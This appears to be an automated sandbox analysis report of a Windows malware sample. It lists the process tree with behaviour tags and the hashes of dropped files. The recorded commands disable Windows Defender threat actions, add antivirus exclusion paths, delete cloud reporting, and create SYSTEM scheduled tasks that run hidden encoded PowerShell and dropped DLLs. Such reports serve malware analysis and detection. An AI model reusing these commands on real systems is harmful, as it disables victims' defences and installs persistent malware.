C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4656
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:1544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:3580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:2584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:3480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:5048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:620
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JQSUAsxhPrkpC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JQSUAsxhPrkpC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NzXptEldKlmGfUJVpfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NzXptEldKlmGfUJVpfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RcLzQsxdNdUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RcLzQsxdNdUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hlZelPwcU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hlZelPwcU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qTJuYfusUOEU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qTJuYfusUOEU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LWEaAEbWcVdTLtVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LWEaAEbWcVdTLtVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\iRdPSefGAWCkAhovC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\iRdPSefGAWCkAhovC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\zmYTWlNURgkpZSQr\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\zmYTWlNURgkpZSQr\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4068 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JQSUAsxhPrkpC" /t REG_DWORD /d 0 /reg:323⤵PID:3948
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JQSUAsxhPrkpC" /t REG_DWORD /d 0 /reg:324⤵PID:2308
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JQSUAsxhPrkpC" /t REG_DWORD /d 0 /reg:643⤵PID:532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NzXptEldKlmGfUJVpfR" /t REG_DWORD /d 0 /reg:323⤵PID:1680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NzXptEldKlmGfUJVpfR" /t REG_DWORD /d 0 /reg:643⤵PID:1292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcLzQsxdNdUn" /t REG_DWORD /d 0 /reg:323⤵PID:208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcLzQsxdNdUn" /t REG_DWORD /d 0 /reg:643⤵PID:1524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hlZelPwcU" /t REG_DWORD /d 0 /reg:323⤵PID:1808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hlZelPwcU" /t REG_DWORD /d 0 /reg:643⤵PID:2600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qTJuYfusUOEU2" /t REG_DWORD /d 0 /reg:323⤵PID:3492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qTJuYfusUOEU2" /t REG_DWORD /d 0 /reg:643⤵PID:3816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\LWEaAEbWcVdTLtVB /t REG_DWORD /d 0 /reg:323⤵PID:4968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\LWEaAEbWcVdTLtVB /t REG_DWORD /d 0 /reg:643⤵PID:3292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\iRdPSefGAWCkAhovC /t REG_DWORD /d 0 /reg:323⤵PID:4692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\iRdPSefGAWCkAhovC /t REG_DWORD /d 0 /reg:643⤵PID:3684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\zmYTWlNURgkpZSQr /t REG_DWORD /d 0 /reg:323⤵PID:2012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\zmYTWlNURgkpZSQr /t REG_DWORD /d 0 /reg:643⤵PID:2448
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gWDcgmpGX" /SC once /ST 09:03:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:1276
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gWDcgmpGX"2⤵PID:2312
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gWDcgmpGX"2⤵PID:5060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ypViPfUThfaozTSkl" /SC once /ST 14:09:06 /RU "SYSTEM" /TR "\"C:\Windows\Temp\zmYTWlNURgkpZSQr\pbjKUMnfczxAOXS\YTtSAKT.exe\" Hb /site_id 757674 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ypViPfUThfaozTSkl"2⤵PID:1196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3144 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4816
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:1472
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3808
-
C:\Windows\Temp\zmYTWlNURgkpZSQr\pbjKUMnfczxAOXS\YTtSAKT.exeC:\Windows\Temp\zmYTWlNURgkpZSQr\pbjKUMnfczxAOXS\YTtSAKT.exe Hb /site_id 757674 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:212 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bdcFCqLpfQmIysFLcB"2⤵PID:2148
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:3660
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:4388
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4400
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:2132
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hlZelPwcU\fXJLdK.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rccJDHdVfEiTauB" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4528
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rccJDHdVfEiTauB2" /F /xml "C:\Program Files (x86)\hlZelPwcU\BRxdtkf.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4604
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "rccJDHdVfEiTauB"2⤵PID:4240
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rccJDHdVfEiTauB"2⤵PID:4840
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FDymCJnYrHFnsG" /F /xml "C:\Program Files (x86)\qTJuYfusUOEU2\DTMUeYC.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4452
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xivrHMiohlCwN2" /F /xml "C:\ProgramData\LWEaAEbWcVdTLtVB\IFZrZIz.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3720
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qvZSfHqOYoGAtVEHo2" /F /xml "C:\Program Files (x86)\NzXptEldKlmGfUJVpfR\XhrwEst.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3620
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uEOlbpZITQfIRzAKOSm2" /F /xml "C:\Program Files (x86)\JQSUAsxhPrkpC\UArEXlT.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:388
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vCaIXqBQfpdmnpiwp" /SC once /ST 06:35:31 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\zmYTWlNURgkpZSQr\ewwyUhHU\BjDJPhH.dll\",#1 /site_id 757674" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "vCaIXqBQfpdmnpiwp"2⤵PID:2192
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:1120
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:4216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:2772
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:4472
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ypViPfUThfaozTSkl"2⤵PID:3976
-
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\zmYTWlNURgkpZSQr\ewwyUhHU\BjDJPhH.dll",#1 /site_id 7576741⤵PID:1376
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\zmYTWlNURgkpZSQr\ewwyUhHU\BjDJPhH.dll",#1 /site_id 7576742⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4372 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vCaIXqBQfpdmnpiwp"3⤵PID:4804
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD508e8f50828df5791eff755fd4b4fc9c9
SHA19a8544b477fa795f2cf4d5088b200bd326f44711
SHA25695847cfd533972d851b49ce86c588b5f2a55a8e15f120c47029a84b0abc2d1fc
SHA51238158e3910d6c8f5edba981a24fd1e4a2731eb6c0cb0500d7978c039158ecf5d12930133f0c36d817c8d5e38df1c7d93427bb86dc5cf67d15f1b0f758c639ec3
-
Filesize
2KB
MD5fdd12a119e3337eda560cb4b903b992f
SHA16e1e75bbe3972e7e55b561c643c7f531556a00d7
SHA2566f2e0513ad191113b1eaf389939561703b9611e5ed34737804d24410e49997d4
SHA5127784561873e3a51fa7567cc1cbd12ad2df0a50e4ff94b747c678e5d6162cb657473a3d67f8f8134229ba16d24a1338f50a089805ec9bc538e7c428c85cf3848f
-
Filesize
2KB
MD557e8ad85a359e35db7ee900d392ce145
SHA124a2df0bc43ae1838616167ae4275351a1de4300
SHA2563cbd2515b1b5d1142479416c34dcc4777370900c4cd34f087a49be907e3279e0
SHA5123de6e43190214798ed6bc0efcd5a3ab2adcae723052906d876151da5d961da440a19bb747de32deb93f602563fb06f5f322eaab8c7e2dbec81054e4f4f2813a1
-
Filesize
2KB
MD595125296142541f350389b26cd1f139b
SHA128c8badf05610d3383fe785ec984adb5c5ecfe71
SHA2560632d0c1145bccd647df45114b77ec591ce9411dc6167c5404ac4c3a5c0c8bd3
SHA512796e4960eda2bcd01dd23c5893f698eae703cc35be2a7ad6722597f341f720ba22561974d7a31b80adeddc2a4be1b593a486bb65c4b0816ab703bf6318041e10
-
Filesize
2KB
MD58eff8ca247160c351023e9d5c030a60a
SHA17ada1a955a22fe1daefa2c09beef763db9097dee
SHA25660162c87dabc483bd4ee216074f63d079374fca5b4ef4eef1abe3ea752cdc0b2
SHA5125f659af8118ed18d1d0384978678422db854ef852325f7ddce57c433203aacb47a90f804295ef71cce5366b1bb60bdbef679124cf5581ad38e609b31763dd4ac
-
Filesize
3KB
MD5f6c90ab0db80c6c3ea92556fda7273c7
SHA101d3866b1887cbb0abe9701f6b49c5dbc66a7dfa
SHA256a823c3b6f157c50315251d43db740ad37a736b967f0500e024e3a0f84192b269
SHA512aa6b71e3a8fa46702787d190e3633b1ead0f66cce81065fa2262dde59c683a7fc48846fa2b0bbe94a050564855fc7a79842f0abfa53cc3315e4c766b3c4c1fbe
-
Filesize
1KB
MD570c5da361f683bd9f67db5acefd09784
SHA15c658b93b087d7cd5c158261d87e8fa42d7fdd2a
SHA2561a7a94c4b05fefdc5201cdd7cb84de4cb3ce2b35f86f56b0f0d8e8d1d900d0a4
SHA512d66df862699ddf6aea98b26ddd7b9f8b03e85d790eb74d266fd56f2c90ce5ff2aed98872792c14da4f91c12c84543a7bb7f63c964de459bf59d10287a3bcc480
-
Filesize
6.3MB
MD5b73a2867ddadf6e023cf92a8b935e60b
SHA1e4e68805fb8916034c6bb8413178e971c8254a15
SHA256c00e6919b64ebabbe4da38e2ea291699f3ed5dbe16f4c3935e3f3f688e75e959
SHA5125921491a5093943621a82114c38fe2eec3b7e03b473fbb355d28f32e7c710c5c02483ce1c7ea3991f40de262f02a652272cab565a1f1ce34afad047217080dec
-
Filesize
6.3MB
